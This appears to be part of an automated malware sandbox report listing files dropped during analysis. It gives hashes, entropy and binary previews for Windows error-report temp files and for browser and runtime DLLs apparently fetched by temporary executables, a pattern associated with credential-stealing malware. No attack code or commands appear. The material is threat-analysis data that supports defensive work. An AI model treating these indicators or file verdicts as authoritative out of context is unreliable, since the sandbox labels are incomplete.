Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER657A.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6971407436417203
Encrypted:	false
SSDEEP:	96:9GiZYWGMx4Pl0oY+Y/IWEHjYEZORtGiDQLQGwTSmaoji6HzeEkInE3:9jZDG7pchVaoj3HzeETnE3
MD5:	64F7EE776EE7CAC029048C92FDE4C6AB
SHA1:	06620D40BD715966A76409E0C59CE8E70AA94AB3
SHA-256:	2C15E406EFFC20548C6D1FF256FD2FE1CF3241B5A0C0749D696B33B3DDCFF021
SHA-512:	E27C789F89EDD597F69BACFC7644B182A48393D0B1F41BC8A08492A0A48828EEF299106962817E09993CEA68E654B2673165DFF744BF8D1BFB5391435B6DE807
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B55.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	22080
Entropy (8bit):	3.103691948047654
Encrypted:	false
SSDEEP:	384:hQ+VPxaDDnHkbjM8zdsW3WRVwE0Waab82IWp3WNyCjT22Gxfqm+hU/UrLjrC5Sce:lZ8HusW3ywEvr82IF/22Wqm+vrieer6f
MD5:	0482CC5F54E7001FF8E9356D88A5C011
SHA1:	6D50718EDBB4CC16A1C5CC8E01F264B59422ADCA
SHA-256:	5C305AE1885B0C8A2F1524AA67749108FED1A527BC377D829F23C58A09ED09D4
SHA-512:	E9AED1AC9221C9DD74BBE8E1A17725777A25A9FEE5F94B1F3530C21067EC6AD28AFEDE8FDB8E9EF543BE18D15C181189A9E81850ADE772AD754122E6DFFC6D06
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE1D.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	55334
Entropy (8bit):	3.0363124170130376
Encrypted:	false
SSDEEP:	1536:rcHSpeI522dFMPQwieeLwK+WINiVRq+bNtly:rcHSpeI522dFMPQwieeLwK+WIQVRq+bc
MD5:	9FDC2E02534F044B97C80C34842CD39B
SHA1:	AB14993C5BF10EA875326F0289D4817D5B8B7EAF
SHA-256:	F9CB749E9DD6281E78A74D502D877174331E9D67E5F3D90A45746918D13D5752
SHA-512:	E144C9D27E468D326FE425E7C584B7DB5F7A41D1D64F7D7D8D7E4A633BF44DB8F2886FBE21C2381A0221D6E3B587E0ABB93CADE4E61C16904F50025633EE11A3
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFF5.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	55350
Entropy (8bit):	3.0351245801944544
Encrypted:	false
SSDEEP:	1536:zkHF/4D22gFMTQBieex/wW9Nj5TBCgb81:zkHF/4D22gFMTQBieex/wW9R5TBCgb81
MD5:	DC437183CD64322A25FED95B1D509BC0
SHA1:	79EE2148B0395EFCEDC97AFA7FEE56245E6D3D1E
SHA-256:	0707A67F90B19E950C593DF48AA47B983B234BDF49B06DB6F292D2B9168F49C8
SHA-512:	4CDCBE9CF30518456EE14FE79B5A60A878C17064B485F63B33F36B462673FDA9A97468904D9389F627B08B95053C49AFD83E7C6CC1A860F23F7E14962839C058
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9BA.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.695813873707676
Encrypted:	false
SSDEEP:	96:9GiZYWiG/5/yYAYsWh0HPYEZ+GCtGigMQvQRwpupaYwSzfsGIE/3:9jZDwXqDMbWaYwSrsBE/3
MD5:	4648E504551A3B7AA06D41941FC8F8BE
SHA1:	49122F372CF30C18D2D25E8E2D4C368C3AA0DC61
SHA-256:	C47606CB5A6F98C05E179174CCDCC9B788C01796A11FA6E479F54357290F575A
SHA-512:	0590B9CC2F38CBA52F50ECAAE2E080D29611E3CE9F1D25D4C897003948618058B8F65846F520F40CA8C25BDDD959EF9EF98C4B0DD7B5AEB454756AA57C926962
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\freebl3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sqlite3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\49B.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	916735
Entropy (8bit):	6.514932604208782
Encrypted:	false
SSDEEP:	24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
MD5:	F964811B68F9F1487C2B41E1AEF576CE
SHA1:	B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:	83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:	565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...\|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\msvcp140[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\vcruntime140[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\nss3[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\freebl3[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
